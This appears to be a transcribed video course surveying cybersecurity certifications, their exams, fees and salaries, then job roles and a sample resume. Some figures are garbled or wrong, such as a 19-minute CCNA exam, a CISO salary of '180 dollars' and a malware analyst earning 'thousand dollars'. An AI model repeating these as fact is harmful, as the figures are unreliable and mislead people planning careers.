So, importance of a cyber security certification. First and foremost, when I see a certification, I look at it from three different aspects. The first is the training itself, which allows me to gain the knowledge, which allows me to understand the aspects of security, or whatever the certification is there for. The second aspect is the exam itself: how do I need to prepare myself for the exam, how do I need to approach the exam, how do I need to ensure that I pass in my first attempt. And the third aspect is the certification itself, which allows me to be eligible to apply for a particular job role. So obtaining a cyber security certification ensures, or shows, to the organization that you're applying to that you do have that prerequisite knowledge and you should be shortlisted for an interview. The knowledge that you have gained during the training will help you when you attend that interview and when you attempt to answer the questions asked to you.

So these certifications are designed for a specific role. For example, a forensic investigation certificate will teach you how to investigate a crime scene forensically, a digital crime scene for that matter. A certified ethical hacking course will teach you about penetration testing. So it is you who is going to decide which certification you require and then attempt to get certified on it. Of course, a fresher with a cyber security certification will have better employment opportunities, because they can showcase their knowledge with the certification that they already have. Even professionals who want to enhance their careers can get into managerial or advanced certifications to improve on their knowledge and get promoted in their job profiles.

So cyber security certifications can be classified in three different aspects: the first one being the foundational level, then the managerial level, and the advanced level.

In the previous video we just had a small overview; here we are going to discuss what the certification covers, how the exams are conducted and the price points for each and every exam. So let's start with the foundational certifications.

We start off with CCNA, which is the basic certification for networking. So the CCNA Routing and Switching certification basically helps you build your networking career. You will join an organization as a networking engineer, where you can help the organization establish the routing, the pathing of how data packets will travel across the network. This certification covers all the basic concepts that you require to understand networking. The basic requirement for this certification is that the candidate must have a bachelor's degree, but apart from that there are no other prerequisites. So it's just that you need a bachelor's degree and then you can apply; you can study for this, you can undergo a training and then you can attempt the exam. The certification provider obviously is Cisco, so the knowledge that is limited to this training and certification is for Cisco devices only. The exam fees for this certification are approximately 325 dollars. The exam, when it is conducted, has around 50 to 60 odd questions which need to be answered in 19 minutes. The types of questions that you are going to get are: multiple choice questions, where you have a question and four answers and you have to choose the correct answers among those; drag and drop, where you have to click on an object and drag it to its appropriate place, probably an architectural diagram, and you have to, let's say, pick a router and place it into a particular position, and if you place it correctly you answer the question correctly, otherwise it's wrong; and a simulator, where there could be a configuration you need to configure in a particular manner, and they then check whether the configuration is correct or not. The pass mark is around 800 to 850 out of a possible thousand marks, so each question will have a different weightage depending on the depth of the question or the difficulty level of the question, which would then count towards your marks, and if you score 800 to 850 that's when you clear the exam. The job roles, as we have discussed over here, would be more on the network administrator side or a network engineer side, depending on the level of experience that you have. The salaries that are expected from these job roles in the US are around fifty five thousand dollars to ninety thousand dollars annually.

The next one is the CompTIA certification called Security+. CompTIA is also a global certification authority for infosec courses. So this certification teaches candidates how to secure applications, networks and devices. It focuses on hands-on practical skills in the field of network security. I have trained people on this certification myself, so I know this certification is quite hands-on: it deals with the concepts to the core, it helps you understand the concepts, and then in the practical hands-on demo you need to execute the practical yourself so that you can gain that knowledge. The recommended level for a candidate to attempt this training would be at least around two years of experience in the IT sector. In addition, if you have already been certified for the Network+ certification from CompTIA, which is the baseline networking certification, this is also a preferred way to go for this certification. As said, CompTIA is the certificate provider, and the exam fees for this certification are 339. The exam is quite simple: 90 questions in 90 minutes, that's one minute per question. It sounds like a lot of time, but believe me, the questions can be a little bit confusing, can be a little bit lengthy, so you will require all those 90 minutes to answer those questions, especially when they're tricky and they're technical in nature. The questions would be multiple choice and performance based. The pass mark for this exam is around 750 points out of a possible 900. The job profiles for this kind of a certification are when you want to apply for a security analyst position or a security engineer's position, where you're going to analyze some data to understand and figure out what problems are ongoing in the organization. The average annual salary of this person would be around 72,000.

Then comes the CEH, or the Certified Ethical Hacker training from EC-Council.

Now this is a very well-known course, and also EC-Council is a global certifying authority, very well accepted across a lot of countries. This is an offensive certification, so here you're basically trying to become a penetration tester: you're taught how to hack, you're taught how to attack a particular organization from an ethical hacker's perspective. So the job profiles that you'll be looking at here are of a pen tester, where you go into an organization, you test their security controls or you test their devices, find out flaws within them, and then provide recommendations of how to plug those flaws or mitigate those flaws and improve the security of that organization. It is recommended that you have two years of experience at least in networking or security to attempt this kind of training and certification. Again, a basic understanding of networking, maybe a little bit of applications and operating systems, would be necessary before attempting this certification. The certification provider is EC-Council, and the exam fees for this certification are 500. So the exam here would be 125 questions which need to be attempted in four hours, and you will only get multiple choice questions in here. Now for CEH there are two exams: one is the multiple choice questions, and the second is a practical exam, where you need to solve some problems given to you in an iLab scenario, and if you are able to solve them properly you then get certified for CEH Practical. The cutoff varies from 65 to 85 percent depending on the questions that you have answered and the weightage associated with each and every question. As said, the job roles would be as a penetration tester or a security engineer, and your salaries would start from around 90,000 annually.

Then comes the CND, or the Certified Network Defender, also from EC-Council. Now this is more on the network defense side, so here again the job roles would be where there's a network that you have and you're going to try to secure the network and the communications that are going to travel over the network. So you need to be a network administrator, a network security engineer or someone in a similar profile, to understand how networks work, and then you're going to attempt to secure those networks. The certificate provider again is EC-Council, and the certification is placed a little bit below CEH, so it becomes network defense, then CEH, where you're going to become a penetration tester. The exam fees for this certification are 350 US dollars. The exam is of 100 questions to be answered in four hours; again it's just multiple choice questions, so you get a question with four options, you answer the correct one and you move on to the next question. The pass percentage again varies from 60 to 85 percent depending on the questions answered and the weightage of that question. Job roles to be applied for: network defense technician, CND analyst, or a security analyst from a network perspective. Salaries would range from 65,000 to 75,000 per annum.

Then comes the forensic investigator course, which is exactly what it is: digital forensic investigator. This will help you understand how computers work, where data is stored, and how you can retrieve that data to investigate a crime that has taken place. So the candidate must have at least two years of experience in the information security sector. They need a good understanding of how networks work, how computers work, how operating systems work, how they store data, the location where that data is stored, how databases work, how those databases store that data, and so on and so forth. This certification is sought after mainly in the law enforcement areas, but there are a few corporates that offer forensic investigation as a service, especially when a corporate gets compromised and they want to conduct their own investigations. The certification provider for this is also EC-Council, and the exam fees are 500.

This is an advanced level certification, so an understanding of applications, networks and operating systems is a must before you attend this. The exam is quite similar: 150 questions in four hours; again it's just a multiple choice question exam. The cutoff again is from 60 to 85 percent, depending on the questions and the weightage of each and every question. Job roles: IT security specialist, network security professional; the job roles are forensic investigators, law enforcement agencies, security specialists, homeland security jobs, and your salaries would be around eighty eight thousand dollars and above.

All right, now let's talk about the managerial level certifications. COBIT stands for Control Objectives for Information and Related Technologies. It's a certification that will give a candidate an in-depth knowledge of the framework which COBIT is all about, and the framework helps you manage and govern enterprise IT environments. Now this is an advanced certification, so around eight years of managerial experience is suggested before you attempt the COBIT 5 certification, to understand all the aspects and to help you implement the framework properly. The certificate provider is ISACA. The exam fees are around 175 dollars. Now this is a small exam, 50 questions but in 40 minutes, so you really have to be on your toes; you have to know the knowledge, there is very limited time to think, and you have to be fast in your answers. The pass percentage is 50 percent. The job roles associated with this certification would be when you apply for an information security manager, or as a security consultant or a cyber security manager, and your roles and responsibilities would be to govern the IT space that the organization owns, so all the servers, desktops, the network, the data flows, the databases, everything, and how it needs to be managed and how it needs to be governed in a secure manner. Annual salaries would be around a hundred thousand dollars plus.

Then the CISM. It stands for Certified Information Security Manager, and as the name suggests it's a security manager certification. It helps the candidate in understanding the relationship between business goals and information security. So now you're going into the space where you're not only technical in nature, but you also have to understand the business needs, the goals of the business, and you have to align the information security of your infrastructure along with the business needs and the business goals. So it is your inputs that are going to go to the management to see if the infrastructure is aligned to the business goals, or if the infrastructure or the business goals need any fine tuning. Around five years of work experience is recommended in the information security field for attempting the CISM; out of the five years, the candidate must have a background as an information security manager for three years, so you have some experience as a manager, you have implemented those things yourselves, which will give you a better understanding, and then you attempt the certification. Again provided by ISACA, and the exam fees for ISACA members are 575 dollars; for non-members it is 760. The exam is where you have to answer 150 questions in four hours, quite a bit of time, but the questions are going to be scenario based questions, where they're going to give you a lot of scenarios; you have to think about it and you have to give the most probable and the correct answer for that particular scenario. The pass mark is 450 out of 800. Your job profiles would be either a risk manager or a risk consultant, analyzing the business requirements against the infrastructure security that you have, to identify if there are any risks associated with the infrastructure, highlight those risks, and then put in security controls and manage those controls in a way where security is mitigated. Your average salaries would be around 88,000 and above.

Then the CISA, the Certified Information Systems Auditor certification. It not only looks into security, but it also looks into auditing and controls in information systems. This is a highly reputed certificate, and you gain a better understanding of governance, regulations, and auditing your information landscape. Again, a minimum of five years of work experience in the field of information systems auditing, control or security is necessary. Now here the question would be, what's the difference? Security is where you're technical in nature: you have done, let's say, a vulnerability assessment or a penetration test, you have implemented firewalls, you have architected security controls. Controls are all about the security controls that you're going to implement, like firewalls, IDSs, IPSs, data loss prevention systems, maybe even UTMs and whatnot; so experience in architecting or implementing those controls in an effective manner, mitigating your security or your vulnerabilities that you have identified in the organization. And auditing would basically mean looking at compliance, to ensure that everything is in place, you're compliant with, let's say, ISO 27001 guidelines or the policies that you have created yourself, and everything is working in order; so it's more of a checklist where you're going to just check everything is in place and you're conforming to standards. This certification is also provided by ISACA, and the exam fees for ISACA members are 575 dollars, whereas non-ISACA members will have to pay 760 dollars for the certification. 150 questions again in four hours, multiple choice questions, scenario based, so you have to really understand real world scenarios of where, what controls and what audit mechanisms should be in place. Pass mark is 450 out of 800. Your job roles would be mainly becoming an auditor or a senior auditor, a director for information security, information audit manager, or information technology consultant, where you provide intelligence on how the company should implement their infrastructure. Average salaries would be 103,000 and above.

Then comes the CRISC, also pronounced "krisk", Certified in Risk and Information Systems Control. This certification helps the candidate design and maintain information systems controls for an organization. This is one of the most sought after certifications as far as

risk management is concerned, in Europe and in the US. If you have this kind of certification you automatically qualify for a risk manager, or a security risk manager, or an information security consultant kind of a role. You should have a minimum of three years of experience in the field of IS controls, that means information security controls: you should have knowledge about firewalls, you should know how to mitigate risks, how to identify risks in the first place, risk analysis, risk management, and after which you're going to implement security controls to mitigate that risk or bring it to acceptable levels. At this point in time you will also be responsible to create policies revolving around those risks, and how you want to calculate those risks and treat those risks in their lifetime. Certificate provider again is ISACA; 575 dollars for ISACA members, 760 dollars for non-ISACA members for the exam fees. A similar question count: 150 questions to be answered in four hours, multiple choice, based on performance, so they may give you a scenario where you have to perform a risk analysis and provide a report and a solution based on your findings. Again the pass mark is 450 out of 800. The job profiles associated, as discussed earlier, are the IT risk management professionals, where they're going to identify risks, treat those risks, calculate, analyze, maybe do a business impact analysis to ascertain how the organization is going to be affected, and then you will also be looking at compliance as far as these job roles are concerned. Average annual salary would be 119,000 and above.

Moving on to advanced level certifications. Now this is where we come across the CISSP certification, Certified Information Systems Security Professional. This is the gold standard of all certifications; if you have this certificate you can basically be assured of a job in the IT world. Now, just to qualify, you'll have to have five years of experience in the information security field. There are eight domains that are specified by CISSP, and you have to prove that you have knowledge and work experience of around five years in at least two of those. That means if you do not have that kind of experience you can still attempt the exam, but you become an Associate of (ISC)², which means that you get six years to accomplish the five years of experience requirement for this certification. Before taking up the CISSP certification, it is suggested that the candidate clears all the intermediate level certifications, not all but some of them. In fact I have seen people do the other way around: they qualify for CISSP, they give the exam, and once you're CISSP the CISA or CISM exams are way easier to crack, but you need to have that kind of experience. I have seen people with 15 years of experience and more fail at this certification in the first attempt. The certificate provider is (ISC)². The exam fees are 699 dollars. Like I said, this certification is the most sought after, the gold standard; in fact there's hardly any other certification after this that you might want to do. The questions: now the exam has changed. If it is the English version that you're giving, it's 150 questions to be answered in three hours; if it is the non-English exam that you're attempting, then it is 250 questions in six hours. It's a marathon, and if you're opting for the six hour exam you need to plan it really well. It sounds really easy, but the questions are quite tough, they're scenario based, and the answers are quite confusing as well. You would get multiple choice questions, you would get drag and drop, and you might get simulators as well. The pass mark is 700 out of 1000, but each question has a different weightage, so it depends on which questions are asked of you and which questions you have answered correctly. The job roles associated with this certification would be anything and everything in information security at the managerial level and above: so information security manager, risk manager, information system security officer, the CSO role, the CISO, Chief Information Security Officer, any role that you might think of from a risk, compliance, strategy perspective could be achievable after this kind of a certification. The average annual salary is hundred and eight thousand dollars for this certification.

So to be an ethical hacker, you must hold a certification which specializes in ethical hacking or in cyber security. Companies look for candidates who are globally certified; when we say globally certified, they're looking for a certificate that has been given by an organization that is recognized globally and is well accepted in the industry. So these are the top five certifications a candidate can obtain: the first one, become a Certified Ethical Hacker; then there is the Global Information Assurance Certification Penetration Tester; then Offensive Security Certified Professional; CompTIA PenTest+; and finally the Licensed Penetration Tester. Now these certifications are offered by different organizations; all of these organizations are recognized globally and their certifications are well accepted in the technical space. So let's start off with the Certified Ethical Hacker, and we'll look at the organizations that provide these certifications and how we can attain them.

So CEH, or Certified Ethical Hacker, in its current form is in its version 10; it's been revised and updated over a period of time. EC-Council is the certifying authority for CEH. They have their own authorized training centers through which you can attend trainings, give those exams, get yourself certified, and thus become globally certified and be eligible to apply for security related jobs. It is a very well known certification and is widely accepted; at the same time, it would test the candidate's knowledge of security threats and preventive measures. Now there are two types of exams that you can give with CEH. One is a multiple choice question exam which is theoretical in nature: they ask you questions and you select the correct answers; if you clear, you get certified. The second certification nowadays is where there's a practical exam associated with it; you'll have to purchase the voucher for that exam and give that exam. The practical exam is held in a virtual lab where you're given scenarios, and based on those scenarios you have to resolve the questions given to you and give proof of

the resolution, which would then get you certified as an ethical hacker. The theoretical exam in this scenario: the fees are around 500; this is for the multiple choice question exam, where you can pay the fees and you can attend through an online portal and you can give the exam directly. The exam is four hours long, in which you have to answer 125 questions. Now four hours for 125 questions seems a long time, but it isn't; it's a very technical exam, there are scenario based questions, and it would take some time for you to analyze and understand the question and then identify the equivalent correct answer. So it's a very competitive exam and you'll have to study really hard to clear this exam as well. The cutoff for passing varies from 60 to 85 percent, so there is no exact grade, and all the questions have different weightages; so depending on the questions that have been given to you and the way that you have answered them, you would pass at either 60 percent or you would pass when you scored 85 percent. Once you are CEH certified, which is a very technical certification, you will be qualified to apply for job roles as a penetration tester or a security engineer. These are job roles where you would be responsible for ethically trying to attack applications, servers, switches, and trying to find out vulnerabilities within them. The training of this certification will make you adept in most of the tools that are required. There are a lot of practicals in this training, and if you successfully complete those practicals, clearing the exam is a quite easy task. With the practicals comes your knowledge, and it would help you understand how you would be performing penetration tests in the real world. An average annual salary in the USA for a CEH certified person is around ninety one thousand dollars, and in India it is around four lakh seventy six thousand odd rupees. The salaries would vary as far as organizations are concerned; more established organizations can afford to pay a little bit more, but these are average salaries that we have seen across the market.

The next certification is the GPEN, also known as the Global Information Assurance Certification Penetration Tester. This certification looks into the different pen testing practices and methods, and also focuses on the various problems in pen testing. So again this is where you're getting certified as a penetration tester, so it's again a technical certification where your knowledge of networking, applications and security will be tested. You will be trained on this of course, so the training will include all these areas where you need to focus, identify those problems, and thus be ready for the real world scenarios. The candidate will have to understand networking concepts and operating systems such as Linux and Windows, and you should be very well aware of the TCP protocols; this is true for any of the technical certifications for ethical hacking. GIAC is the certification provider; it's again a very well renowned and well accepted certification authority across the globe. The exam fees are 1899; 82 to 215 questions to be answered in three hours. Now why 82 to 215? It depends on the test that has been associated, and depending on how you're answering those questions you would be given that many number of questions to begin with, but all of these need to be answered in three hours. 74 is the pass percentage that is required to clear this exam. The average annual salary in the USA is around 96,000, while in India it is similar to Certified Ethical Hacker.

Then looking at the next certification, from Offensive Security, called the OSCP, Offensive Security Certified Professional. This is another penetration testing certification, highly technical in nature, and it is an entirely hands-on certification. In the previous two certifications that we saw, we talked about CEH where there are two different exams: you could either take the theoretical exam and give your MCQs, or you could take the practical one. Here you don't have an option; this is a practical exam. So the test is conducted on a virtual network: they send out instructions to you, there's a virtual lab that is given out to you, and they give you the questions, and you have to perform those assessments, create those reports and provide them to the certifying authority, in this case Offensive Security. If you match their criteria for whatever you have identified in those reports, you get certified. Here the requirements are a good understanding of networking protocols, how systems function, how the Kali Linux operating system functions, and the candidate must complete Offensive Security's Penetration Testing with Kali Linux course and pass the hands-on exam. So this focuses purely on Kali Linux. Kali Linux is an operating system that is freely distributed over the internet and comes structured with around 300 plus tools used for ethical hacking, so this course totally relies on Kali Linux for you to use as a tool set for penetration testing. The certificate provider, as stated, is Offensive Security; the name of the course is OSCP, Offensive Security Certified Professional; the exam is around 800 to 1550. Now understand that this exam is technical and is hands-on, so for you to prepare for this exam they come up with virtual labs where you can start practicing and honing your skills. Depending on the number of days for which you have purchased the access to those particular labs, the amount will vary from eight hundred dollars, which would be the minimum access days available, to one thousand five hundred and fifty dollars, where the maximum number of days would be given to you for practicing. Once you're ready, even during the time span where you have that access, once you're ready for the exam you can attempt the exam and clear it. The average annual salary is similar, around 91,000 for the US market and 905,000 rupees in the Indian market.

Then looking at the CompTIA PenTest+. CompTIA is another certification authority, or a certification provider, a training provider, that will help you get yourself certified in the ethical hacking space. So they have a certification called PenTest+, which is focused towards penetration testing. So it is an intermediate level certification; it assesses the vulnerability assessment and the penetration testing skills of a candidate. Here the training will provide you with all the essentials, where it will help you identify how to do vulnerability assessments, how to identify those vulnerabilities, and then which tools to utilize for what kind of a penetration test. For the requirements, a minimum of three to four years of hands-on experience in the information security field, and also a CompTIA Security+ or a Network+ or equivalent knowledge is required. So in the Network+ they talk about securing networks, and they help you understand the OSI layers, the TCP layers, and help you understand the protocols and all of those things; so having that knowledge is an added advantage. The certificate provider is CompTIA, and the cost of the exam is around 349. The maximum number of questions is 85, and I think it's a three hour exam. The passing percentage is scoring 750 marks out of a possible 900. So the scale is: the minimum you can ever score is 100 if you're completely unprepared.

The maximum you can score is 900. uh you get a leeway of 150 marks for your certifications so you have to score a minimum of 750 to clear the exam average annual salary for a hampshire certified penetration test plus professional is 97 000 in the u.s market and in the indian

Market it would be around 5 lakh rupees.

Then comes the Licensed Penetration Tester. Now this is an advanced certificate, again from EC-Council. This is where EC-Council gives you a license which certifies that you have undergone thorough training and have cleared your exam, in which you can conduct or lead an audit for vulnerability assessment and penetration testing. It is an expert-level certification; it comes after the CEH certification. It is the ultimate test which tests the candidate's penetration testing skills. So there are two certifications over here: one is the ECSA, EC-Council Certified Security Analyst. Once you clear that, you can appear for the Licensed Penetration Tester. Both of these are hands-on certifications, so you will be given a virtual lab, you will be given a scenario in which you'll have to perform some assessments, create reports and submit them to EC-Council. They will analyze your reports, and if they meet the criteria that have been identified, you would then be certified as a Licensed Penetration Tester.

The candidate must be above 18 years of age. A recertification is required every three years, so the validity is three years; after three years you will have to be re-certified, or there is a continuing education point system over there where you can score points by publishing articles, by attending trainings or giving out trainings, and you can get yourself re-certified. It is preferred that the candidate has the CEH and the ECSA certification: so the previous certification that we saw, Certified Ethical Hacker, and then the ECSA, EC-Council Certified Security Analyst, after which you can appear for the LPT, Licensed Penetration Tester. The certificate provider again is EC-Council.

The Licensed Penetration Tester exam has a different process. The candidate must purchase an exam dashboard for 899, which is valid for a year. So once you purchase the voucher, the validity is one year; you can prepare within that one year and then give the exam and attain the certification. Only once you're ready, the exam can be scheduled and you can give that exam. The exam consists of three different levels, and each level has three different challenges. The candidate must pass at least one challenge in order to qualify for the next level, and for each level the exam is six hours. So this is a grueling exam; this is hands-on, they're giving you challenges and they are going to test you on your skills as a penetration tester, so be ready to be very hands-on for this kind of a certification. The average annual salary in the US is around a hundred thousand dollars and above, and in India 825,000 and above.

In today's world, data is generated and exchanged at a high speed. Did you know that 2.5 quintillion bytes of data are generated every day?

Companies all over the world make crucial decisions by analyzing all of this data. With the rise of data there has been a tremendous increase in the number of cyber crimes across the globe. To prevent cyber attacks, cyber security is implemented. So what is cyber security? It is nothing but the practice of protecting networks, programs, computer systems and their components from unauthorized digital access. As mentioned earlier, companies rely on data, and it is required that the data is not compromised or stolen. To do this job we have various cyber security professionals who are skilled to protect data from cyber attacks. There has been a sky-high growth in the number of cyber security jobs. This growth will only double in the near future, as companies will always be on the lookout for skilled professionals who can protect the confidentiality of the data.

So now that we know why cyber security jobs are important, let us have a look at the various cyber security job roles. There are various kinds of cyber security job roles; let's go through a few of the top-paying job roles, going in the descending order of the salary structures in the USA. We first have the Chief Information Security Officer job role, followed by the Security Architect, Penetration Tester, then we have Cyber Security Engineer, Malware Analyst, and finally we will look into the Computer Forensic Analyst job role. I will now preview each of these job roles individually and look into their responsibilities, skills and salary structures both in the USA and in India.

So let's start off with Chief Information Security Officer. A CISO is a senior-level officer in any organization. He is entrusted with the safety of the data in an organization. A CISO has various responsibilities: they are required to develop, implement and maintain an organization's security and risk management program. They also communicate with their organization's stakeholders and brief them about various information-related security concerns; by doing so they are able to implement a better security system for an organization. At times a CISO would have to also recruit an IT team's members; they need to make sure that the candidate is knowledgeable and skilled. A company's risks and vulnerabilities have to be predicted beforehand, and prediction of such risks and vulnerabilities is taken care of by a CISO. They play a major role in preventing cyber attacks in any organization.

Let's now look at the different skills required to be a Chief Information Security Officer. First and foremost, a candidate must have good communication and presentation skills; this is very important for any organization. A degree in computer science along with an MBA is a preferred qualification. An MBA is not mandatory, but there is an added advantage if the candidate has an MBA along with a computer science degree. The candidate must be good at handling security breaches; it is preferred that the candidate has prior experience of handling a security breach and is also good with incident management. Many employers prefer candidates who have global certifications to become a Chief Information Security Officer. The preferred certifications are CISM, that is Certified Information Security Manager, and Certified Information Systems Security Professional, CISSP. If a candidate has either of these certifications, they have a better chance of getting a job as a Chief Information Security Officer.

Let's now move on to their salary structures. A CISO earns nearly 180 dollars in the USA; in India the salary is nearly 25 lakhs per annum. That's a lot of money. So these were the responsibilities, skills and the salary structure of a Chief Information Security Officer. Let's move on to our next role. Our next role is that of a

Security Architect. A security architect maintains the security of an organization's computer systems; they prevent the computer systems from malware attacks. Let's look into their responsibilities. First and foremost, a security architect identifies weak spots in a system by performing vulnerability tests; these tests are carried out on a regular basis. Along with vulnerability tests, risk analysis and security assessments are also done by a security architect. Installation of routers, VPNs and firewalls is approved by a security architect. These devices are very important when it comes to the security of an information system, so a security architect rightly approves the installation of these devices. Digital signatures and public key infrastructures are designed. In addition to all the above responsibilities, a security architect also provides technical assistance and guidance to the other security team members.

Let's now move on to the skills required to be a security architect. First and foremost, the candidate must have a computer science or an information technology degree. Coming to the experience, the candidate must have experience in the field of risk management, as the role of a security architect has a lot to do with managing risks. Understanding of the network basics and various security protocols, along with cryptography, is required to be a good security architect. Lastly, the preferred certification to become a security architect is that of a CISSP, which is Certified Information Systems Security Professional. As mentioned earlier, this is only a preferred certification; a candidate who has this certification has a higher chance of bagging a security architect job.

Let's now look into the different salary structures in the USA and in India. In the USA a security architect earns nearly 123,000 dollars per annum; in India a security architect earns nearly 20 lakhs per annum. So that's all about security architect. Let's now move

On to our next role, that is Penetration Tester. A penetration tester, also known as an ethical hacker, is a cyber security professional who tries to exploit a security system just like a hacker would; a penetration tester mimics the role of a hacker. Let's look into the various responsibilities of a penetration tester. As the name suggests, a penetration tester needs to perform penetration tests to discover and identify vulnerabilities in a system. In addition to this, they are also responsible for designing new penetration tools. All the penetration test results are documented, and based on the document new security measures are discussed with the other IT team and the management. A penetration tester performs tests by developing code, and they also conduct security audits, which help them understand the vulnerabilities in a system.

Let's now look into the different skills required to be a penetration tester. A candidate must have one to four years of experience in the information security field. Knowledge of Windows, Linux and Unix operating systems is required; also, the candidate must know C and C++. Languages such as Java, PHP and Perl are preferred by employers but are not a requirement to successfully bag the position of a penetration tester. The preferred certifications are Certified Ethical Hacker, that is CEH, and Certified Expert Penetration Tester, that is CEPT.

Let's look into the salary structures of a penetration tester. In the USA a penetration tester earns nearly 117,000 dollars per annum, and in India a penetration tester makes nearly 4 lakh rupees per annum. So those were the responsibilities, skills and salary structures of a penetration tester. Let's now move on to our next job role, that is Cyber Security Engineer. On the whole, a cyber security engineer protects an organization's network and its data; they

Also plan security measures to prevent an organization from cyber attacks. Let's look into the responsibilities of a cyber security engineer. They design cyber security platforms for a company. They are also responsible for planning and implementing cyber security measures; a cyber security engineer solely designs, plans, maintains and implements security measures in an organization. They are also required to report and communicate with the other teams in an organization. A cyber security engineer is different from a network security engineer: while a network security engineer looks into the troubleshooting, a cyber security engineer looks into the prevention of cyber attacks.

Let's look into the skills required to become a cyber security engineer. Just like the other job profiles, a degree in computer science or information technology is a must. Two years of experience in the relevant field is required to become a cyber security engineer. A cyber security engineer is needed to design security systems, hence a candidate with good problem-solving skills is required. Along with good problem-solving skills, the candidate must also be good with networking skills. As mentioned earlier, knowledge of C and C++ is a must; Java and Python knowledge is preferred to be a cyber security engineer.

Moving on to the salary, a cyber security engineer earns nearly 96,000 dollars in the USA, whereas in India a cyber security engineer earns nearly 7 lakh rupees per annum. Moving on to our next job role, that is Malware Analyst. As the name suggests, a malware analyst is one who identifies various cyber threats

Such as worms, viruses, trojans and bots to understand their nature. A malware analyst is skilled at analyzing the different malware threats in a system. Let's now look into a malware analyst's responsibilities. They are responsible for identifying threats, and once they identify them, they are supposed to document the methods to avoid such malware threats. They also research and develop malware protection tools; various malware protection tools are developed by malware analysts so that the next time a cyber threat occurs they're able to easily identify it. In addition to the above responsibilities, a malware analyst is also responsible for constantly staying updated with the new malware threats.

Moving to the skills required, a candidate must know Windows, Linux and Unix operating systems, and knowledge of C and C++ is a must. Usage of tools like IDA Pro, OllyDbg, RegShot and TCPView is suggested. Having a GIAC Reverse Engineering Malware certification is a plus point; the certification is only a preferred certification, it is not a must that the candidate possesses this certification. Moving on to the salary structure, a malware analyst earns nearly thousand dollars in the USA and earns nearly rupees six lakhs per annum in India. So those were the skills,

Responsibilities and salary structure of a malware analyst. Let's move on to our last job role, that is Computer Forensic Analyst. Previously we have seen the job roles wherein they try to protect a company from a cyber attack; in this role we will see how a computer forensic analyst works after a cyber attack. A computer forensic analyst works on cases following an attack; they collect digital evidence to retrieve information. Let's look into their responsibilities. With the help of various investigation tools, a computer forensic analyst gathers evidence from a system which was a victim of a cyber attack. Their main responsibility lies in recovering deleted, manipulated or stolen data. A computer forensic analyst helps various officials in investigating a case by discovering evidence from data which was manipulated or compromised. There have been a lot of cases where a computer forensic analyst has come to the rescue of the police department.

Moving on to the skills, the candidate must hold a bachelor's degree, and work experience in the related field is required for the post of a computer forensic analyst. It is not necessary that the candidate must hold a computer science degree, but the candidate must have relevant work experience. A candidate must have knowledge of networking, law and criminal investigation, as they have a lot to do with investigating cases as well. A sound analytical mind is critical, as they have to analyze data and arrive at conclusions so as to identify the cyber criminals. The preferred certifications to become a computer forensic analyst are Certified Forensic Computer Examiner, that is CFCE, and Certified Computer Examiner, that is CCE. Well, these were the skill sets required to become a computer forensic analyst. Moving on to the salary structures, a computer forensic analyst earns nearly 71,000 dollars in the USA, and in India a computer forensic analyst earns nearly 8 lakh rupees per annum. That was all about computer forensic analyst.

Well, those were the six top-paid jobs in the field of cyber security. Now I will run you through a sample resume of a cyber security engineer. This is only a sample resume of

A cyber security engineer; you can alter it according to your own preference. Here we first start off with the name and your email ID and phone number, then a quick summary about yourself, what you're good at and what you are looking for in an organization, after which you can give your LinkedIn profile link and your GitHub profile link if you have one. Moving on to the experience, here you would have to give the company's name and the tenure. Ideally, for a cyber security engineer the minimum number of years required is two, and below that you can write the different responsibilities that were taken care of by you in your previous organization. TCP network administration and security monitoring are two important responsibilities that any cyber security engineer must have on their resume; it is great if you have configured firewalls and IDS as well. Underneath that you can mention the education, and it is required that you have a degree in computer science or in information technology. You can then mention your university and your GPA.

Moving on to the skills, we have technical skills and non-technical skills. Here under technical skills you would have to write the languages that are known to you, for example C and C++, which is a must; Java and Python are preferred too. Knowledge of Windows, Linux and Unix operating systems will also have to be on your resume if you're applying for the post of a cyber security engineer. The other skills differ from person to person; here I have IDS and IPS, penetration and vulnerability testing, encryption technologies, and knowledge of SQL. At the end you can also write the certifications; ideally a cyber security engineer must have CCNA and CCNP certifications, and in addition to it even a CompTIA certification is preferred. Moving on to the non-technical skills, here you can mention the languages that you're good at and the different competitions that you have participated in; it can also have your co-curricular activities, and anything to do with problem solving would also be an added advantage.

First let me briefly introduce CompTIA before moving on to the CompTIA Security+ certification. The Computing Technology Industry Association, better known as CompTIA, is a leading vendor-neutral IT

Certification provider in the world. CompTIA is considered one of the top trade associations; its vendor-neutral certification program is undoubtedly one of the best in the IT industry. For more than two decades CompTIA has developed certification exams and training for networking, security, open source development and cloud, to name a few. CompTIA certifications continue to address the requirements and necessities of today's technology challenges. CompTIA certifications are grouped by skill set; presently CompTIA certifications are classified into four areas: core, infrastructure, cyber security and additional professional certifications. If you have a job that may involve some sort of certification, you must consider obtaining that certification. Certifications are very crucial; CompTIA certifications are a way for IT professionals to demonstrate their knowledge of computers.

Let us now have a look at a few of the certifications offered by CompTIA. First we have CompTIA A+. The CompTIA A+ certification is an entry-level certification for IT technicians. This certification is designed for employees who are seeking a career as a support, service center or networking technician. This certification tests a candidate's understanding of basic networking, troubleshooting and security skills. It covers laptop and PC hardware, software installation, and configuration of operating systems. According to CompTIA, more than one million IT professionals hold the A+ certification.

Next we have CompTIA Network+. You can either start with the A+ certification; however, if you have the experience, you can move directly to the CompTIA Network+ certification. This certification is for professionals who carry a minimum of nine months of networking experience. Here a candidate must be familiar with networking technologies, topology, security, installation and configuration, and troubleshooting of wireless and wired network devices.

Next we have CompTIA Security+. CompTIA Security+ covers network security concepts, threats and vulnerabilities, access control, identity management, cryptography and much more. We will closely look at the CompTIA Security+ certification in this video. And finally there is CompTIA Cloud+. The CompTIA Cloud+ certification finds its importance as the cloud computing market continues to grow by leaps and bounds. This certification targets IT professionals with two to three years of experience in storage, networking or data center administration. The certification exam tests the candidate's knowledge of cloud technologies, cloud markets, and hybrid and multi-cloud solutions. Those were a few of the certifications offered by CompTIA; there are several other certifications like CompTIA Linux+, CompTIA PenTest+ and CompTIA Project+, to name a few.

Now let us have a look at the CompTIA Security+ certification in detail. So what is the CompTIA Security+ certification? Well, the CompTIA Security+ certification is a leading entry-level IT certification. It is an essential certification for professionals working in the IT industry; it is one of the first security certifications that must be earned by IT professionals. It provides the core knowledge required of any cyber security role and provides a springboard to various intermediate-level cyber security jobs. This certification teaches you how to secure applications, devices and networks. It also focuses on hands-on practical skills in the field of network security. The certification teaches you skills from spotting and mitigating risks to troubleshooting security incidents. It is to be noted that IT professionals with CompTIA Security+ know how to address security incidents and not just identify them.

